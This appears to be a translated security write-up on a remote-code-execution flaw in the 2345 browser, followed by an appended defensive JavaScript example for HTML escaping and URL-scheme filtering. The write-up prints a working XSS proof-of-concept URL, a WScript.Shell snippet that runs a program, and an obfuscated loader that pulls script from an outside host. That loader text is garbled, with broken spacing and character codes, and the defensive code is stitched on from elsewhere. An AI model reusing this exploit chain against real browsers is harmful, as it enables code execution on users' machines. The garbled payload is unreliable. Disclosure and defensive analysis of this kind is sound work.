2345 browser: remote code execution caused by a browser design defect
Simple and brutal. A rank of 20 would not look out of place.
First, update the 2345 browser to the latest version:
The current 2345 browser still allows the javascript: pseudo-protocol to be set as the home page, but that is not the focus of this article. The focus is on command execution caused by a serious design defect.
In a case I submitted earlier, I explored how to debug some PoCs. While testing my 2345 online favorites, I was surprised to find that the links in my favorites could execute commands:
That is to say, this is neither the traditional 2345:// scheme nor a traditional privileged domain: through the javascript: protocol we call the 2345:// protocol directly, so the code runs in the local zone. The harm is therefore very serious.
However, detailed testing showed that not every domain can do this. After some fuzzing, we found that an XSS under *.2345.com is enough to trigger it.
So we need an XSS in the .2345.com domain, which is not hard to find.
http://skin.chrome.2345.com/?a=%3Cimg%20src=1%20onerror=alert(1)%3E
Chrome's XSS filter would intercept this, but the default configuration of the 2345 browser does not block it:
With a privileged domain in hand, you know what to do.
Construct the code that triggers the defect:
var f=document.createElement("a");f.href='javascript:WSH=new ActiveXObject("WScript.Shell");WSH.run("calc.exe")';document.body.appendChild(f);f.click();
For details, see:
http://wutongyu.info/alert.js
Although it is only triggered when the a tag is clicked, we can use the JS click() function to trigger it automatically.
Link generated after obfuscation:
Http://skin.chrome.2345.com /? A = % 3 Cimg % 20src = 1% 20 onerror = eval ('window. s = document. createElement (String. fromCharCode (115,99, 114,105,112,116); window. s. src = String. fromCharCode (104,116,116,112, 47,119,117,116,111,110,103,121,117, 46,105,110,102,111, 108,101,114,116, 46,106,115,); document. body. appendChild (window. s) ') % 3E
Access the above URL with the latest 2345 browser:
Simple and brutal.
Solution:
Review how the browser handles the javascript: pseudo-protocol. When any website sets an anchor's href to javascript:, the script should run only in the context of the page that contains the anchor, not in the privileged local context.
The XSS itself has been fixed, but that treats the symptom rather than the root cause.
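Two defensive checks for the chain described above, as an added example that is not code from the 2345 browser or from the original report: output-encoding for the reflected parameter (the skin.chrome.2345.com fix), and a scheme policy that a browser's link handler could apply so that a javascript: href is never dispatched to a privileged URL handler. The scheme lists, the renderParam template, the origin allowlist and the sample inputs are assumptions constructed for the example.

```javascript
// Added example (not the 2345 browser's code or the report author's code).
// 1. escapeHtml/renderParam: output-encode the reflected "a" parameter so the
//    <img onerror=...> payload becomes text instead of markup.
// 2. classifyHref/allowNavigation: a scheme policy for a link handler, so that
//    script schemes never reach a privileged handler and custom privileged
//    schemes are honoured only from an explicit origin allowlist.

const SCRIPT_SCHEMES = new Set(["javascript:", "vbscript:"]);
// Hypothetical: custom schemes that dispatch to local, privileged handlers.
const PRIVILEGED_SCHEMES = new Set(["2345:"]);

// 1. Output encoding for an HTML text context.
function escapeHtml(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// Hypothetical server-side template for skin.chrome.2345.com/?a=...
function renderParam(a) {
  return "<p>" + escapeHtml(a) + "</p>";
}

// 2. Scheme policy.
// Browsers strip ASCII tab/newline anywhere in a URL, and leading/trailing C0
// controls and spaces, before parsing, so "java\nscript:" is still
// javascript:. Normalize the same way before inspecting the scheme.
function normalizeHref(href) {
  return String(href)
    .replace(/[\t\n\r]/g, "")
    .replace(/^[\x00-\x20]+|[\x00-\x20]+$/g, "");
}

// The custom "2345:" scheme starts with a digit, so the grammar here is looser
// than RFC 3986 (which requires a leading letter) on purpose.
function schemeOf(href) {
  const m = /^([a-z0-9][a-z0-9+.-]*):/i.exec(normalizeHref(href));
  return m ? m[1].toLowerCase() + ":" : null; // null: relative URL
}

function classifyHref(href) {
  const scheme = schemeOf(href);
  if (scheme === null) return "relative";
  if (SCRIPT_SCHEMES.has(scheme)) return "script";
  if (PRIVILEGED_SCHEMES.has(scheme)) return "privileged";
  return "web";
}

// Decide whether a link on pageOrigin may be handed to the URL handler.
// Script schemes are never dispatched: a javascript: href runs in the page's
// own document (its own origin) or not at all. Privileged schemes are honoured
// only from an explicit allowlist of origins, which is empty by default.
function allowNavigation(pageOrigin, href, trustedOrigins = []) {
  switch (classifyHref(href)) {
    case "script":
      return false;
    case "privileged":
      return trustedOrigins.includes(pageOrigin);
    default:
      return true;
  }
}

// Constructed sample input: the payload reflected by the URL in the report.
const REFLECTED = "<img src=1 onerror=alert(1)>";
console.log(renderParam(REFLECTED));
console.log(classifyHref("javascript:alert(1)"),
  allowNavigation("https://skin.chrome.2345.com", "javascript:alert(1)"));
```

The order of the checks is the point: the script-scheme test runs before the allowlist is ever consulted, so an allowlisted origin cannot smuggle a javascript: href into the privileged handler. A wildcard entry such as *.2345.com is exactly the weak spot the report found, since one reflected XSS on any host under it inherits the privilege; an allowlist should name individual origins and stay as short as possible.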